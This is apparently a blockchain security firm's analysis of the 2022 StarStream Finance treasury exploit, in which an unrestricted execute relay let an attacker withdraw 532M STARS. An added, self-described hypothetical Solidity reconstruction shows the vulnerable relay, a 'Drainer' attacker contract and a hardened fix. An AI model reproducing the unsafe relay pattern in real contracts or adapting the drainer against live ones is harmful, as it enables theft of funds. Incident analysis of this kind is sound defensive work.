April 08, 2022

Beosin: Analysis of the Attack on StarStream



On April 8, 2022, according to Beosin-Alert, StarStream Finance’s DistributorTreasury contract was exploited for 532M $STARS, which the attacker then swapped for 900 ETH. The Beosin security team analyzed the incident; the results are as follows:


StarStream Introduction


Starstream is a suite of products that provides yield aggregation, yield generation and one-click smart contracts on the Metis L2 rollup. The protocol is maintained by various developers and governed by STARS holders.



Related Information


● Transaction hash:


0xb1795ca2e77954007af14d89814c83b2d4f05d1834948f304fd9d731db875435


● Exploiter’s address:


0xffd90c77eaba8c9f24580a2e0088c0c940ac9c48


● Contract that launched the attack:


0x75381c1f12733fff9976525db747ef525646677d


● Attacked contract:


0x6f99b960450662d67bA7DCf78ac959dBF9050725


Attack Process


1. The project party (0x000007-d653cd) created the StarstreamTreasury (0x1075da-0c90e9) and DistributorTreasury (0x6f99b9-050725) contracts and transferred ownership of the StarstreamTreasury contract to DistributorTreasury.


2. The attacker exploited the unsafe low-level call in the execute function of the DistributorTreasury contract to make DistributorTreasury call an arbitrary external function. Because DistributorTreasury is the owner of StarstreamTreasury, the attacker used it to call withdrawTokens on the StarstreamTreasury contract and withdrew a total of 532,571,155.859 $STARS.




Vulnerability Analysis


The root cause of this vulnerability is that the execute function of the DistributorTreasury contract performs a low-level call to a caller-supplied target with caller-supplied calldata, without restricting who may call it. Any account can therefore make DistributorTreasury execute arbitrary functions on its behalf, and since DistributorTreasury owns StarstreamTreasury, every owner-only function of the treasury, including withdrawTokens, became callable by anyone.
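The following is an added illustration of the pattern described in the Attack Process and Vulnerability Analysis sections above; it is a hypothetical reconstruction written for this write-up, not StarStream’s actual source code. The contract names TreasuryVault, UnsafeDistributor, SafeDistributor and Drainer, the function signatures, and the whitelist design in the hardened version are all assumptions. It shows an owner-gated treasury whose ownership sits with a distributor contract, an unrestricted execute relay that lets any caller act with the distributor’s privileges, an attacker contract that drains the treasury through that relay, and a hardened relay that gates execute behind an owner check and a target/selector whitelist.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

// Hypothetical reconstruction for illustration only; not StarStream's code.

interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
}

// Minimal ownership, modelled on the usual Ownable pattern.
abstract contract Ownable {
    address public owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() { owner = msg.sender; }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function transferOwnership(address newOwner) external onlyOwner {
        require(newOwner != address(0), "zero owner");
        emit OwnershipTransferred(owner, newOwner);
        owner = newOwner;
    }
}

// Holds the tokens; only its owner may withdraw. In the incident, ownership of
// the treasury had been transferred to the distributor contract.
contract TreasuryVault is Ownable {
    function withdrawTokens(address token, address to, uint256 amount) external onlyOwner {
        require(IERC20(token).transfer(to, amount), "transfer failed");
    }
}

// VULNERABLE: anyone may relay an arbitrary call through this contract, so any
// caller inherits every privilege the contract holds (here: vault ownership).
contract UnsafeDistributor {
    function execute(address target, bytes calldata data) external returns (bytes memory) {
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}

// Attacker contract: the step the write-up describes, expressed in code.
// The vault checks msg.sender == owner, and msg.sender is the distributor.
contract Drainer {
    function drain(UnsafeDistributor dist, TreasuryVault vault, address token, uint256 amount) external {
        dist.execute(
            address(vault),
            abi.encodeWithSelector(TreasuryVault.withdrawTokens.selector, token, msg.sender, amount)
        );
    }
}

// HARDENED (assumed design): only the distributor's owner may relay calls, and
// only to a pre-approved (target, function selector) pair.
contract SafeDistributor is Ownable {
    mapping(address => mapping(bytes4 => bool)) public allowed;

    function setAllowed(address target, bytes4 selector, bool ok) external onlyOwner {
        allowed[target][selector] = ok;
    }

    function execute(address target, bytes calldata data) external onlyOwner returns (bytes memory) {
        require(data.length >= 4, "no selector");
        bytes4 selector = bytes4(data[:4]);
        require(allowed[target][selector], "target/selector not allowed");
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}
```

The onlyOwner check on SafeDistributor.execute is what the page’s recommendation on permission control amounts to; the selector whitelist is an extra defence so that even a compromised governance key cannot reach functions that were never meant to be relayed.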


Fund Tracing


The current flow of funds is shown below:



Summary


In response to this incident, the Beosin security team recommends:


1. Smart contract developers should pay attention to permission control when designing and implementing key operations, in particular any function that makes low-level calls to caller-supplied targets;


2. Before a project goes live, a professional contract security audit is highly recommended to avoid security risks.


Beosin can provide professional security audit services. For more details, please visit our official website or contact us via Twitter, Discord or Telegram, etc.
